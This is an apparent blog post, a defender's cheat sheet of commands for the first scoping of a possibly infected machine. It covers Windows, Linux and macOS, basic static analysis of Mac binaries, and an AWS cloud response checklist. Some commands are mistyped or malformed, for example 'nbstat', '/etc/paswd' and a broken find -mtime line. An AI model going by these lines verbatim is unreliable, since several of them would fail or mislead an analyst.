Initial IR Scoping

Initial IR Scoping Process for Windows / Linux / Mac

Recently, I was trying to find some resources to create a simple playbook for IR. However, I’ve noticed that for newer analysts, they often don’t know where to start or what to look for. Available resources were very scattered, deep & detailed, or hard to find. This is my attempt at combining and highlight things to look for in different OS during the initial scoping on an infected machine. As I’m sharing my notes, please let me know if there’re anything crucial that I am missing from this list!

Throughout this process, I have read through many blog posts, whitepapers, and videos from the internet and the SANS reading room. Credits goes to the original authors, and their original content will be listed at the end under Sources/Resources. :)

Windows:

Look for anomalies:

ps — list out processes running
taskmgr.exe — it displays running processes and services
tasklist
wmic process list full
tasklist /svc

Unusual files / registry keys:

reg query
HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx

Generally those three registry entries will contain startup configurations for specific programs, including malware

Unusual Network Usage:

net view localhost
net session
nbstat -S
netstat

Unusual start up / Scheduled tasks

msconfig -display all — startup configurations from services to files in startup folders etc…
schtasks
wmic startup list full

Unusual accounts:

lusrmgr.msc
net user
net localgroup administrators

Event Viewers:

Look for unusual behavior:
Warnings, errors, system reboots…etc
Log files missing …etc

— — — — — — — — — —

Linux:

Unusual Processes and services:

ps -aux
ps -ef
lsof -p
lsof +L1

Unusual files:

find / -uid 0 -perm -4000 –print -> searches for files that have root permissions
find / -size +50000k –print — searches for files of a specified or greater size. This is particularly useful for searching for files that may not belong on the system, like movies, games, et al.

Network usage:

ip link | grep PROMISC
netstat -nap
arp -a -display all

Scheduled jobs:

cat /etc/crontab
ls etc/cron.*

Unusual Accounts use:

sort –nk3 –t: /etc/paswd | less
egrep ‘:0:’ /etc/passwd
getent passwd | grep ‘:0:’
find / -nouser –print

Log files:

/var/log(s)
/var/messages

Other:

uptime
free
df

— — — — — — — — — —

Mac:

Unusual Processes and services:

ps -axo user,pid,ppid,%cpu,%mem,start,time,command

Info about app + exe paths:

lsappinfo list

Unusual files: Audit popular locations often populated by malware:

/Library
~/Library
Application Support
ls -al ~/.* ~/~/Library /Library ~/Library/Application\ Support /Library/Application\ Support/
ls -al /Users/Shared
ls -al /private/tmp
ls -al $TMPDIR

Persistence:

/var/root

Network usage: Open port + connection

netstat -na | egrep ‘LISTEN|ESTABLISH’
netstat -nap
arp -a -display all
ifconfig

Scheduled jobs:

crontab -l

What’s running in a particular user’s domain:

launchctl list
sudo launchctl list — list of services running in the system wide domain
sudo launchctl print user/501

Unusual Accounts use: Return list of users (system + login users)

dscl . list /Users UniqueID
dscl . list /Users UniqueID | grep -v ^_ (console login only)

Previous logged in users / shut down systems
last

List of files with open IPv4/6 or HP-UX X25 connection:

lsof -I

Log files: Search -> Console

/var/root

There’re a few other logs there as well

Other:

top
htop

Look for any files created since or between a certain time/date:

Last 30 mins: find . -mtime +0m -a -mtime -30m -print

Query LSQuarantine Database to see what items have been downloaded by email clients/browsers:

sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* ‘select LSQuarantineEventIdentifier, LSQuarantineAgentName, LSQuarantineAgentBundleIdentifier, LSQuarantineDataURLString, LSQuarantineSenderName, LSQuarantineSenderAddress, LSQuarantineOriginURLString, LSQuarantineTypeNumber, date(LSQuarantineTimeStamp + 978307200, “unixepoch”) as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp’ | sort | grep ‘|’ — color

Mdfind query on the quarantine bit:

mdfind com.apple.quarantine

Gather systemConfiguration property list to look for malz that tries tohijack Mac’s DNS server setting:

plutil -p /Library/Preferences/SystemConfiguration/preferences.plist

Inspect Mac’s auto proxy setting:

scutil — proxy

— — — — — — — - Mac Initial Malware Analysis for binaries: Tools:

Strings, file, nm, xattr, mdls,
Hex editors: hexdump, od, xxd
Static disassembler — otool, lldb
Hopper, Cutter, Raddare2, Floss

Basic Initial File Analysis:

Code signed?
codesign -dvvvv -r — <file.app>

Is cert still valid?
spctl — verbose=4 — assess — type execute <file.app>

Application Bundle Structure
cd <file.app>/Contents

Check out Info.plist and MacOS + Resource folder
putil -p Info.plist

Resource Folder:
ls -al
ls -haltF
file <file.ext>
Find extended attributes + permissions
xattr -l
mdls — list metadata held by spotlight + finder

Macho Binary
file <file>
pagestuff <file> -a
nm -m <file>
strings — <file> > ~/Malware/strings-.txt
otool -L <file> > ~/Malware/libs.txt

Dump methods names:
otool -oV <file> > ~/Malware/methods.txt

Disassembly:
otool -tV <file> > ~/Malware/disassembly.txt
grep “http” disassembly.txt
xattr -l <file>

— — — — — — — — — — — — — — —

Cloud

Preparation:

Start a case in The Hive, choose category as “Cloud”

Response:

Activate AWS CloudTrail
- Records of AWS API calls for the account and complete log file for ALL activities
Activate AWS Config
- Managed service providing inventory, configuration history, and configuration change notification
Use AWS Config in Discovery Mode
- Discover resources existing in EC2 account and record their configuration including info on resources that have been deleted. This have a comprehensive snapshot of all resources and their configuration attributes to provide a complete inventory of resources.
Use AWS Config in continuous assessment
- Generate set of reports related to governance & compliance configs for AWS resources,
Prepare a network diagram
- Diagram of network given the network interfaces on instances
Document ALL systems connected to EC2 environment
- Scan with an external scanning agents
- Scan with application testing tool
Find app securities that can be exploited
Discover injected code and other vuln that could be exploited
Capture PCAP File
- Capture full tcpdump pcap files for each of inbound and outbound interfaces
- Quickly analyze PCAP file
AWS Config -> Identify instances
- Take snapshot of each instance. Document the snapshot ID of each.
- Create volumes for each snapshot
- For each snapshot, create a volume. This will be the disk volume that will be used for deep forensic analysis. Make note of volumeID.
- If EC2 site runs on multiple AWS Avail. Zone, repeat the steps of InstanceID -> SnapshotID -> VolumeID for each. Simple use of PsExec for attackers can allow them to move.

Depending on how severe, different containment choices:

suspending system instances
Building new instances to take over processing
Wait for forensic response to take action

Follow management’s order to contain the system

Prior to suspension or deactivation of servers, capture volatile data. It could show several types of malicious software or root kits. Each may have droppers that will reinstall the evil malz upon reboot.
Capture volatile data from each server system

Sources / Resources:

Published 2 Nov 2019

Security engineer. Blue teamer. What about you?TV0 on Twitter